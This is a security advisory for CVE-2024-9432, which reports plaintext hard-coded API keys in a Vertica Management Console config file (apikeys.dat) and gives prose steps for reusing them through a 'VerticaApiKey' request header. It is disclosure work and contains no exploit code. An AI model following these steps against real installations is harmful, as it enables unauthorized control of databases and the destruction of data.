Vulnerability Description: Use of Hard-coded Credentials - CWE-798
Software Version: 10.1.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-9432
CVSS:
Severity:
Credits: Davide Brian Di Campi, Massimiliano Brolli
The product creates, stores, and uses hard-coded plaintext keys that are needed for authorization when calling protected APIs.
Step-by-step instructions and PoC
An attacker having access to the system where the Vertica Management Console is installed can retrieve valid API-keys and abuse them to create, modify and destroy Vertica’s data and processes, even if they are stored on other systems (in the following example, we have access to a machine with IP 10.X.X.35 and can perform operations over data stored on another machine with IP 10.X.X.33). Moreover, the file cannot be moved, renamed, or deleted, since it is used internally by the product itself and when doing that some features will stop working.
Steps to reproduce:
1) Login into the system where Vertica Management Console is installed and navigate to the installation directory path. Go inside the “config” folder, where you can find the file “apikeys.dat”, containing the plaintext list of valid API-keys along with other information like the level of security.
2) You can now use those keys to create authorized requests to Vertica Management Console APIs. A “VerticaApiKey” header containing one of the keys must be added to the API request.
Security Impact
An attacker that has gained access to the system can obtain valid API-keys to perform authorized request to Vertica Management Console APIs. This can lead to the compromise of databases and processes, even on other systems. Since there are sensible APIs that can create, modify, and destroy data, an attacker that has found the hard-coded keys in the system can gain access to all the databases’ information, manipulate and destroy data, and has the capability to shut down services.